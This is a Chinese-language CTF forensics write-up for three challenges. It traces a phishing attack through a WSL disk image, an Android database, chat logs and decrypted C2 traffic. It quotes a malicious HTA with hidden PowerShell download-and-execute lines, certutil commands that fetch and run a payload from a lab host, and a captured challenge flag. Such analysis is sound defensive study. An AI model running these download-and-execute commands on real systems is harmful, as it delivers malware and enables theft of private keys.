这次比赛拿到了所有被解出的forensics题目的一血,开心了,发个wp

TPA 01-🌐

14G巨大附件,还好网速可以 :p

取证大师打开,一眼就看到了里面的wsl

思路一下就清晰了,去找wsl的磁盘文件就好了

位置如下

复制代码
  1. 分区2_本地磁盘[D]:\Users\r3kapig\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\ext4.vhdx

dump下来再拖进取证大师,得到根目录下的F14G文件

复制代码
  1. Hi players,welcome !
  2. Ops,what's that?
  3. 2d422fc7f2c628c55520984c0673964eb5454dea72f79b1022a34728294c5bf8
  4. I guess u need a key to decrypt it.
  5. SELECT something FROM somewhere with the windows10 lol~

看到最后一段话就知道key可能就在原来的机器里面的mysql里,直接去找

然后就可以发现里面的jpg图片,提取出来就可以看见key了

直接解密即可

TPA 02 - 📱

按照题目描述就知道流量包里面是被钓鱼时候的流量,直接翻就看到密码了

密码为

复制代码
  1. l0v3_aNd_peace

然后去手机里找电话号码,由于是钓鱼,就想到了通讯录之类的东西,于是直接在Peggy/data/data/com.android.providers.telephony/databases里找到了两个电话号码,拼起来就行

复制代码
  1. r3ctf{15555215558_l0v3_aNd_peace}

TPA 03 - 💻

由于手机里是钓鱼,于是可以在这里的电脑里继续搜索钓鱼的痕迹,可以发现看过这样一个网页

复制代码
  1. C_Users_TPA/TPA/AppData/Local/Microsoft/Windows/INetCache/IE/ZMSHFBYP/temp[1].hta

内容如下

复制代码
  1. <script language="VBScript">
  2. Function var_func()
  3. Dim open_pdf
  4. Set open_pdf = CreateObject("Wscript.Shell")
  5. open_pdf.run "powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://192.168.30.1:8088/duanwufangjia.pdf',$env:temp+'/duanwufangjia.pdf');Start-Process $env:temp'/duanwufangjia.pdf'", 0, true
  6. Dim hta
  7. Set var_hta = CreateObject("Wscript.Shell")
  8. var_hta.run "powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://192.168.30.1:8088/hhh.exe',$env:temp+'/hhh.exe');Start-Process $env:temp'/hhh.exe'", 0, true
  9. End Function
  10. var_func
  11. self.close
  12. </script>

可以看到下载了duanwufangjia.pdf和hhh.exe,并且都放在了temp里面,直接去找就可以

同时在桌面上可以发现Gajim.lnk,这是一款通信软件,则猜测在这里实施了钓鱼,于是去找他数据库,在C_Users_TPA/TPA/AppData/Roaming/Gajim/Logs.db

里面就有聊天记录,如下

复制代码
  1. T,把 flag 发给我一下,记得加密。
  2. -----BEGIN PGP MESSAGE-----
  3. hF4DQOZFkOnTo78SAQdAaOkhX64uECdRxqrvFjUAgGkefY/lVoFp2rnn7I9lKwcw
  4. 5LN5bO2Y0PDbp8vkHMIWh4HAgERjvBkdBATFW3pFIZWB7JjNxJd0+vO0ENVUV8XG
  5. 1MAhAQkCEGBAK0C+LBjxWsPdHPKhFyNzJPC/tDGAbTB5sB8bb/VLmToqPIbRfEli
  6. Xhf6uZ7CDWMkyVWQQKwoyUIprDBUguKx4/smci99rLKbVeStKK/7j5ZyJAHc4lqK
  7. dhxAHTurzQsgR+yhDOVCiA/vIkfMBxFb7rwBXPNgJbv5lFMuqFbIjR4Btw3BbY90
  8. 1fG4SF69fljKrW3KdM1zyLWODxio682rCxc4OjViKaEZpE7680WApOhDGmIPy4SP
  9. zJU+s6U9LMvNIgGCJAE7SWrexssYhsqx4cuVK0R/VVck4pgy
  10. =YxnN
  11. -----END PGP MESSAGE-----
  12. 请查收端午节放假安排。
  13. http://192.168.30.1:8088/%E7%AB%AF%E5%8D%88%E8%8A%82%E6%94%BE%E5%81%87%E5%AE%89%E6%8E%92.pdf.lnk
  14. 怎么打不开?
  15. 很抱歉,先前下发的文件损坏,新文件见 http://192.168.30.1:8088/%E7%AB%AF%E5%8D%88%E8%8A%82%E6%94%BE%E5%81%87%E5%AE%89%E6%8E%92.zip
  16. 请查收端午节放假安排。
  17. http://192.168.30.1:8088/%E7%AB%AF%E5%8D%88%E8%8A%82%E6%94%BE%E5%81%87%E5%AE%89%E6%8E%92.zip

很明显就是在这里实施的钓鱼并下载了hhh.exe

然后就是对于hhh.exe的逆向了,这里使用dnspy直接打开会发现原文件经过了混淆

使用github上的项目de4dot-cex即可去除混淆,得到大致的逻辑

Class1里面有c2通信的逻辑,GClass0是一些配置信息,GCLass1里面有两个很大的buffer

先看这两个大buffer,根据逻辑

全部提取出来后放进cyberchef就可以解压缩,出来是两个dll

一个是PacketLib一个是offline

然后看Class1里面的通信逻辑

其实就是将payload经过PacketLib里面的序列化方法序列化之后再把长度添加到前面然后直接发送出去,于是去看之前提取出来的PacketLib.dll里面序列化的逻辑

逻辑就是经过了一个QuickLZ压缩之后使用RSMEncrypt去加密,继续深入,查看RSMEncrypt

这里就很明了了,使用输入的key和8位\x00的salt进行密钥派生得到了key和iv并将其运用于aescbc加密,最后把16字节的guid放前面

密钥派生的过程,可以直接使用python,salt为\x00*8,key则是GClass0.string_0经过了Encoding.Unicode.GetBytes处理,GClass0.string_0可以直接看到是123456789

将其转变为UTF-16编码,即每个后面加个\x00

然后用脚本进行密钥派生得到key和iv

复制代码
  1. from Crypto.Cipher import AES
  2. from Crypto.Protocol import KDF
  3. salt = b"\x00"*8
  4. key = bytes.fromhex("310032003300340035003600370038003900")
  5. key_bytes = KDF.PBKDF2(key, salt, dkLen=32, count=1)
  6. print("key: ", key_bytes[:16].hex())
  7. print("iv: ", key_bytes[16:].hex())

然后对一开始的document文件夹里面的DFIR.pcapng里的通信流量进行解密,通信端口为GClass0里的9875,先看tcp.stream eq 0

对上面一部分进行解密,前几个是长度和类型,去掉即可

可以看到已经初具雏形,但是还不够,因为还有一道QuickLZ,这里找了好久也没有找到合适的python实现,于是直接复制了PacketLib.dll里的解压缩函数

复制代码
  1. using System;
  2. using System.IO;
  3. using System.Reflection;
  4. using System.Text;
  5. class Program
  6. {
  7. public static byte[] Decompress(byte[] source)
  8. {
  9. int num = xxx;
  10. int num2 = 9;
  11. int i = 0;
  12. uint num3 = 1U;
  13. byte[] array = new byte[num];
  14. int[] array2 = new int[4096];
  15. byte[] array3 = new byte[4096];
  16. int num4 = num - 6 - 4 - 1;
  17. int j = -1;
  18. uint num5 = 0U;
  19. int num6 = source[0] >> 2 & 3;
  20. if (num6 != 1 && num6 != 3)
  21. {
  22. throw new ArgumentException("C# version only supports level 1 and 3");
  23. }
  24. if ((source[0] & 1) != 1)
  25. {
  26. byte[] array4 = new byte[num];
  27. Array.Copy(source, 9, array4, 0, num);
  28. return array4;
  29. }
  30. for (; ; )
  31. {
  32. if (num3 == 1U)
  33. {
  34. num3 = (uint)((int)source[num2] | (int)source[num2 + 1] << 8 | (int)source[num2 + 2] << 16 | (int)source[num2 + 3] << 24);
  35. num2 += 4;
  36. if (i <= num4)
  37. {
  38. if (num6 == 1)
  39. {
  40. num5 = (uint)((int)source[num2] | (int)source[num2 + 1] << 8 | (int)source[num2 + 2] << 16);
  41. }
  42. else
  43. {
  44. num5 = (uint)((int)source[num2] | (int)source[num2 + 1] << 8 | (int)source[num2 + 2] << 16 | (int)source[num2 + 3] << 24);
  45. }
  46. }
  47. }
  48. if ((num3 & 1U) == 1U)
  49. {
  50. num3 >>= 1;
  51. uint num8;
  52. uint num9;
  53. if (num6 == 1)
  54. {
  55. int num7 = (int)num5 >> 4 & 4095;
  56. num8 = (uint)array2[num7];
  57. if ((num5 & 15U) != 0U)
  58. {
  59. num9 = (num5 & 15U) + 2U;
  60. num2 += 2;
  61. }
  62. else
  63. {
  64. num9 = (uint)source[num2 + 2];
  65. num2 += 3;
  66. }
  67. }
  68. else
  69. {
  70. uint num10;
  71. if ((num5 & 3U) == 0U)
  72. {
  73. num10 = (num5 & 255U) >> 2;
  74. num9 = 3U;
  75. num2++;
  76. }
  77. else if ((num5 & 2U) == 0U)
  78. {
  79. num10 = (num5 & 65535U) >> 2;
  80. num9 = 3U;
  81. num2 += 2;
  82. }
  83. else if ((num5 & 1U) == 0U)
  84. {
  85. num10 = (num5 & 65535U) >> 6;
  86. num9 = (num5 >> 2 & 15U) + 3U;
  87. num2 += 2;
  88. }
  89. else if ((num5 & 127U) != 3U)
  90. {
  91. num10 = (num5 >> 7 & 131071U);
  92. num9 = (num5 >> 2 & 31U) + 2U;
  93. num2 += 3;
  94. }
  95. else
  96. {
  97. num10 = num5 >> 15;
  98. num9 = (num5 >> 7 & 255U) + 3U;
  99. num2 += 4;
  100. }
  101. num8 = (uint)((long)i - (long)((ulong)num10));
  102. }
  103. array[i] = array[(int)num8];
  104. array[i + 1] = array[(int)(num8 + 1U)];
  105. array[i + 2] = array[(int)(num8 + 2U)];
  106. int num11 = 3;
  107. while ((long)num11 < (long)((ulong)num9))
  108. {
  109. array[i + num11] = array[(int)(checked((IntPtr)(unchecked((ulong)num8 + (ulong)((long)num11)))))];
  110. num11++;
  111. }
  112. i += (int)num9;
  113. if (num6 == 1)
  114. {
  115. num5 = (uint)((int)array[j + 1] | (int)array[j + 2] << 8 | (int)array[j + 3] << 16);
  116. while ((long)j < (long)i - (long)((ulong)num9))
  117. {
  118. j++;
  119. int num7 = (int)((num5 >> 12 ^ num5) & 4095U);
  120. array2[num7] = j;
  121. array3[num7] = 1;
  122. num5 = (uint)((ulong)(num5 >> 8 & 65535U) | (ulong)((long)((long)array[j + 3] << 16)));
  123. }
  124. num5 = (uint)((int)source[num2] | (int)source[num2 + 1] << 8 | (int)source[num2 + 2] << 16);
  125. }
  126. else
  127. {
  128. num5 = (uint)((int)source[num2] | (int)source[num2 + 1] << 8 | (int)source[num2 + 2] << 16 | (int)source[num2 + 3] << 24);
  129. }
  130. j = i - 1;
  131. }
  132. else
  133. {
  134. if (i > num4)
  135. {
  136. break;
  137. }
  138. array[i] = source[num2];
  139. i++;
  140. num2++;
  141. num3 >>= 1;
  142. if (num6 == 1)
  143. {
  144. while (j < i - 3)
  145. {
  146. j++;
  147. int num12 = (int)array[j] | (int)array[j + 1] << 8 | (int)array[j + 2] << 16;
  148. int num7 = (num12 >> 12 ^ num12) & 4095;
  149. array2[num7] = j;
  150. array3[num7] = 1;
  151. }
  152. num5 = (uint)((ulong)(num5 >> 8 & 65535U) | (ulong)((long)((long)source[num2 + 2] << 16)));
  153. }
  154. else
  155. {
  156. num5 = (uint)((ulong)(num5 >> 8 & 65535U) | (ulong)((long)((long)source[num2 + 2] << 16)) | (ulong)((long)((long)source[num2 + 3] << 24)));
  157. }
  158. }
  159. }
  160. while (i <= num - 1)
  161. {
  162. if (num3 == 1U)
  163. {
  164. num2 += 4;
  165. num3 = 2147483648U;
  166. }
  167. array[i] = source[num2];
  168. i++;
  169. num2++;
  170. num3 >>= 1;
  171. }
  172. return array;
  173. }
  174. static void Main(string[] args)
  175. {
  176. byte[] compressedData = { };
  177. byte[] result = Decompress(compressedData);
  178. string res = string.Join("", result.Select(b => b.ToString("X2")));
  179. Console.WriteLine(Encoding.UTF8.GetString(result));
  180. Console.WriteLine(res);
  181. }
  182. }

需要修改的分别是第十行的长度和178行的压缩后的payload

长度很好看,即解密后payload去除开头的16字节guid后的第六位往后四个,小端序

然后直接转成10进制数组放进代码里解密就可以了

这样就解密出了c2的通信内容,方便起见,这里不在贴出后面命令的截图了,直接给

复制代码
  1. dir
  2. "C:\Program Files\7-Zip\7z.exe" a gnupg.zip gnupg
  3. cd C:\Users\TPA\Documents
  4. certutil.exe -urlcache -split -f http://192.168.30.1:8088/sy5tem.exe
  5. sy5tem.exe

可以发现把gnupg打了个包,于是在流量里找到它并解密,在tcp.stream eq 15

解密结果如下,可以清晰看到这是个zip压缩包

解压即可得到被删除的gnupg文件夹里面原本的内容,直接用这个文件夹将本地的gnupg文件夹覆盖即可读到里面的私钥

直接解密先前的pgp message即可